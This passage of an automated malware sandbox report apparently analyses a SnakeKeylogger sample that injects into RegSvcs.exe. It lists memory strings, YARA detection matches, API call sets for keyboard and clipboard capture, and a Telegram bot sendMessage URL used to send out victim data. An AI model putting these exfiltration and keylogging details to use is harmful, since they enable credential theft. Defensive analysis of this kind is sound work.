                Source: RegSvcs.exe, 00000002.00000002.4488752677.0000000006780000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.0000000006845000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.0000000006841000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484266848.000000000141A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000357C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.00000000067FA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RegSvcs.exe, 00000002.00000002.4485162305.0000000003364000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: W2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003364000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000002.00000002.4485162305.0000000003364000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 00000002.00000002.4485162305.0000000003364000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20a
                Source: RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RegSvcs.exe, 00000002.00000002.4485162305.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003364000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000333E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: W2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000002.00000002.4485162305.000000000333E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000002.00000002.4485162305.0000000003364000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.00000000032F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000333E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00FF425A
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FF4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00FF4458
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00FF425A
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FE0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00FE0219
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_0100CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0100CDAC

                System Summary

                barindex
                Source: 0.2.W2k2NLSvja.exe.1580000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.W2k2NLSvja.exe.1580000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.W2k2NLSvja.exe.1580000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: W2k2NLSvja.exe PID: 5700, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 6504, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: This is a third-party compiled AutoIt script.0_2_00F83B4C
                Source: W2k2NLSvja.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: W2k2NLSvja.exe, 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7dd54d3c-4
                Source: W2k2NLSvja.exe, 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f6fdb27a-2
                Source: W2k2NLSvja.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b11906a3-8
                Source: W2k2NLSvja.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4fcc8bd0-7
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FE40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00FE40B1
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FD8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00FD8858
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FE545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00FE545F
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F8E8000_2_00F8E800
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FADBB50_2_00FADBB5
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F8E0600_2_00F8E060
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_0100804A0_2_0100804A
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F941400_2_00F94140
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FA24050_2_00FA2405
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FB65220_2_00FB6522
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FB267E0_2_00FB267E
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_010006650_2_01000665
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F968430_2_00F96843
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FA283A0_2_00FA283A
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FB89DF0_2_00FB89DF
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FB6A940_2_00FB6A94
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F98A0E0_2_00F98A0E
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_01000AE20_2_01000AE2
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FE8B130_2_00FE8B13
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FDEB070_2_00FDEB07
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FACD610_2_00FACD61
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FB70060_2_00FB7006
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F931900_2_00F93190
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F9710E0_2_00F9710E
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F812870_2_00F81287
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FA33C70_2_00FA33C7
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FAF4190_2_00FAF419
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FA16C40_2_00FA16C4
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F956800_2_00F95680
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FA78D30_2_00FA78D3
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F958C00_2_00F958C0
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FA1BB80_2_00FA1BB8
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FB9D050_2_00FB9D05
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F8FE400_2_00F8FE40
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FABFE60_2_00FABFE6
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FA1FD00_2_00FA1FD0
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F536500_2_00F53650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_014CF3682_2_014CF368
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_014C9E282_2_014C9E28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_016600402_2_01660040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_016600122_2_01660012
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018CC1472_2_018CC147
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018C53622_2_018C5362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018CD2782_2_018CD278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018CC4682_2_018CC468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018CC7382_2_018CC738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018CE9882_2_018CE988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018C69A02_2_018C69A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018CCA082_2_018CCA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018C9DE02_2_018C9DE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018CCCD82_2_018CCCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018CCFAA2_2_018CCFAA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018C6FC82_2_018C6FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018C29EC2_2_018C29EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018CF9792_2_018CF979
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018CE97A2_2_018CE97A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018C3AB82_2_018C3AB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018C3E092_2_018C3E09
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: String function: 00FA0D27 appears 70 times
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: String function: 00F87F41 appears 35 times
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: String function: 00FA8B40 appears 42 times
                Source: W2k2NLSvja.exe, 00000000.00000003.2033866011.000000000402D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs W2k2NLSvja.exe
                Source: W2k2NLSvja.exe, 00000000.00000003.2034135306.0000000003E83000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs W2k2NLSvja.exe
                Source: W2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs W2k2NLSvja.exe
                Source: W2k2NLSvja.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 0.2.W2k2NLSvja.exe.1580000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.W2k2NLSvja.exe.1580000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.W2k2NLSvja.exe.1580000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: W2k2NLSvja.exe PID: 5700, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 6504, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@4/4
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEA2D5 GetLastError,FormatMessageW,0_2_00FEA2D5
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FD8713 AdjustTokenPrivileges,CloseHandle,0_2_00FD8713
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FD8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00FD8CC3
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00FEB59E
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FFF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00FFF121
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FF86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00FF86D0
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F84FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00F84FE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeFile created: C:\Users\user\AppData\Local\Temp\aut1FE8.tmpJump to behavior
                Source: W2k2NLSvja.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
